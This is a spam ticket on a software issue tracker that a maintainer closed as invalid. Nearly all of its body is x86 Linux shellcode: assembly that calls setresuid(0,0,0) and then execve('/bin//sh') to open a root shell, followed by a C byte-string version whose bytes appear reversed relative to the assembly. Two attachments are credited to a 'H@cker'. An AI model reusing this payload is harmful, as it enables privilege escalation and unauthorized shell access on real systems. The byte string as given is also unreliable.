Opened 7 years ago

Closed 7 years ago

Last modified 7 years ago

#9312 closed (invalid)

If you'd like a username, see the

Reported by: anonymous Owned by: nobody
Component: HTTP handling Version: 1.0-alpha-2
Severity: Keywords: --[code]--
Cc: --[code]-- Triage Stage: Unreviewed
Has patch: yes Needs documentation: no
Needs tests: no Patch needs improvement: no
Easy pickings: UI/UX:

Description

--[code]--
BITS 32

;setresuid(0,0,0)
xor eax, eax
xor ebx, ebx
xor ecx, ecx
cdq
mov BYTE al, 0xa4
int 0x80

;execve("/binsh", ["/binsh", NULL], [NULL])
push BYTE 11
pop eax
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push ecx
mov edx, esp
push ebx
mov ecx, esp
int 0x80
--code--

Shellcode string:
--[code]--
char shellcode [] =
"\x80\xcd\xe1\x89\x53\xe2\x89\x51\xe3\x89\x6e\x69\x62\x2f\x68\x68\x73\x2f\x2f

\x68\x51\x58\x0b\x6a\x80\xcd\xa4\xb0\x99\xc9\x31\xdb\x31\xc0\x31"
-code-

Attachments (2)

...BY-H@cker B@tu....url (132 bytes) - added by the king 7 years ago.
optional
...BY-H@cker B@tu....2.url (132 bytes) - added by anonymous 7 years ago.

Download all attachments as: .zip

Change History (4)

Changed 7 years ago by the king

optional

Changed 7 years ago by anonymous

comment:1 Changed 7 years ago by julien

  • Needs documentation unset
  • Needs tests unset
  • Patch needs improvement unset
  • Resolution set to invalid
  • Status changed from new to closed

spam

comment:2 Changed 7 years ago by anonymous

  • milestone post-1.0 deleted

Milestone post-1.0 deleted

Note: See TracTickets for help on using tickets.
Back to Top